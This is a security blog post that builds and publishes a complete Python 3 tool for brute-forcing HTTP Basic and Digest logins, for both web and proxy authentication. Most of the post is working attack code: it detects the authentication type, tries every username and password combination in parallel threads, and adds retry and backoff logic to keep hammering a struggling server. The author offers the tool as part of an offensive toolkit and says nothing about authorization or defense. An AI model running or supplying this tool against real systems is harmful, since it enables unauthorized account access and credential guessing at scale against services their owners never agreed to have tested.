d3d ^ is a freelance security researcher (among other things) that ❤ exploit development, bug hunting, and writing offensive security tools.

Brute-forcing HTTP Authentication with Python3

1 min read

In this post I am going to create a tool to brute-force HTTP Authentication for both Basic and Digest authentication mechanisms which includes the WWW and Proxy settings using Python 3.8 along with the Asyncio and Requests modules. This tool will be used to build a credentials list using user-supplied data, identify the HTTP Authentication mechanism during a sanity check, and then brute-force the form exhausting the credentials list looking for a valid login.

If you don’t know anything about HTTP Authentication or how it works, I recommend checking out this link here to get a basic understanding. If you want further reading I would recommend RFC2617.

Python

For this specific tool I will be using the requests module, which is a blocking module, so I will need to run it within a ThreadPoolExecutor using a max worker count that will be supplied by the user. I will also be using Path from the pathlib module to help parse user-supplied data.

import itertools
import asyncio
import requests
# noinspection PyUnresolvedReferences
from requests.packages.urllib3.util.retry import Retry
from requests.auth import HTTPBasicAuth, HTTPDigestAuth, HTTPProxyAuth
from requests_toolbelt.auth.http_proxy_digest import HTTPProxyDigestAuth
from requests.adapters import HTTPAdapter
from concurrent.futures import ThreadPoolExecutor
from pathlib import Path
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings()

Next, I am going to create a class named HTTPAuthBreaker that will expect a URL, user list, pass list and number of workers to be passed during the object instantiation.

class HTTPAuthBreaker:
def __init__(self, url: str, user_list: str, pass_list: str, workers: str):
self.url = url
self.user_list = self.__return_list(user_list)
self.pass_list = self.__return_list(pass_list)
self.auth_type = self.__sanity_check(url)
self.workers = int(workers)
if not self.auth_type:
raise KeyboardInterrupt(f"URL {url} failed the sanity check. Are you sure its using HTTP Auth?")

During an offensive security engagement, you sometimes already know the username or password you want to use, and need only to pass a list of the other. Below, the static method __return_list will iterate over file contents if __item is a file, if not, __item is treated as a string, and returns a list either way.

@staticmethod
def __return_list(__item: str) -> list:
stub = []
config = Path(__item)
if config.is_file():
for x in open(__item):
stub.append(x.rstrip())
else:
stub.append(str(__item).rstrip())
return stub

The __sanity_check method will ensure the URL is using an HTTP Authentication mechanism, and load the appropriate class to handle the authentication exchange.

@staticmethod
def __sanity_check(__url):
__auth = False
__codes = [401, 407]
with requests.get(__url) as req:
if req.status_code not in __codes:
return False
if req.status_code == 401 and 'www-authenticate' in req.headers.keys():
if str(req.headers['www-authenticate']).lower().startswith("basic "):
print(f"[!] HTTP Security Authentication identified as HTTP Basic")
__auth = HTTPBasicAuth
elif str(req.headers['www-authenticate']).lower().startswith("digest "):
print(f"[!] HTTP Security Authentication identified as HTTP Digest")
__auth = HTTPDigestAuth
elif req.status_code == 407 and 'proxy-authenticate' in req.headers.keys():
if str(req.headers['proxy-authenticate']).lower().startswith("basic "):
print(f"[!] HTTP Security Authentication identified as Proxy Basic")
__auth = HTTPProxyAuth
elif str(req.headers['proxy-authenticate']).lower().startswith("digest "):
print(f"[!] HTTP Security Authentication identified as Proxy Digest")
__auth = HTTPProxyDigestAuth
return __auth if __auth else False

The next method, __auth_check, is used to check the authentication credentials using the specific security mechanism detected by __sanity_check.

def __auth_check(self, session: requests.Session, auth: tuple):
with session.get(self.url, auth=self.auth_type(auth[0], auth[1]), verify=False) as res:
if res.status_code == 200:
print(f"\n[!] --> Credentials Found! [{auth[0]} {auth[1]}]\n")

Now to tie the class together with the asynchronous main co-routine that will run the worker instances within the ThreadPoolExecutor, as well as setup a Retry attribute to the requests Sessions object that includes retry attempts and a backoff_factor. Connection errors can start to occur if the tool is sending more requests than the target server can handle, the Retry and backoff_factor is used to mitigate connection errors by retrying the connection, and each attempt the backoff_factor is increased to give the target server more time to recover in order to accept a new request.

async def main(self):
credentials = []
for u, p in itertools.product(self.user_list, self.pass_list):
credentials.append((u, p))
if len(credentials) < self.workers:
self.workers = len(credentials)
with ThreadPoolExecutor(max_workers=int(self.workers)) as executor:
with requests.Session() as session:
retry = Retry(connect=3, backoff_factor=0.1)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter=adapter)
session.mount('https://', adapter=adapter)
__loop = asyncio.get_event_loop()
tasks = [
__loop.run_in_executor(
executor,
self.__auth_check,
*(session, auth))
for auth in credentials
]
for _ in await asyncio.gather(*tasks):
pass

Last item I added was a client helper including information about how to use the tool with various examples.

def usage():
u = f"""
USAGE:
{argv[0]} -h "http://127.0.0.1" -u "admin" -p /tmp/passwords.txt
{argv[0]} -h "http://127.0.0.1" -u /tmp/users.txt -p /tmp/passwords.txt
{argv[0]} -h "http://127.0.0.1" -u /tmp/users.txt -p /tmp/passwords.txt -w 20
OPTIONS:
'-h', '--host' - Set the URL target with Basic Auth login form.
'-u', '--users' - Set the username or path to file containing users.
'-p', '--passwords' - Set the password or path to file containing passwords.
'-w', '--workers' - Set the number of workers to run during attempts.
"""
print(u)
if __name__ == "__main__":
import argparse
from sys import argv
parser = argparse.ArgumentParser(add_help=False, usage=usage)
parser.add_argument('-h', '--host', action='store', dest='host', default='')
parser.add_argument('-u', '--users', action='store', dest='users', default='')
parser.add_argument('-p', '--passwords', action='store', dest='passwords', default='')
parser.add_argument('-w', '--workers', action='store', dest='workers', default='1')
arg = None
try:
arg = parser.parse_args()
except TypeError:
usage()
exit("Invalid options provided. Exiting.")
if not arg.host or not arg.users or not arg.passwords:
usage()
exit("Required options not provided. Exiting.")
loop = asyncio.get_event_loop()
try:
print(f"\n[+] Starting brute-force process...")
print(f"[+] Target: {arg.host}")
print(f"[+] Workers: {arg.workers}")
obj = HTTPAuthBreaker(arg.host, arg.users, arg.passwords, arg.workers)
future = asyncio.ensure_future(obj.main())
loop.run_until_complete(future)
except KeyboardInterrupt as exc:
print(f"[x] Error: {exc}\n")
finally:
loop.close()

After about an hour of coding, I was able to finish this tool to add to my offensive security toolkit.

d3d ^ is a freelance security researcher (among other things) that ❤ exploit development, bug hunting, and writing offensive security tools.

Setting up GNS3 on Arch Linux

GNS3 is used by hundreds of thousands of network engineers worldwide to emulate, configure, test and troubleshoot virtual and real networks. It’s also a great...
d3d
1 min read

Setting up the ‘PhanTap’

The ‘PhanTap’ is an ‘invisible’ network tap written by the guys at NCC Group and aimed at red teams. With limited physical access to...
d3d
2 min read

Leave a Reply

Your email address will not be published. Required fields are marked *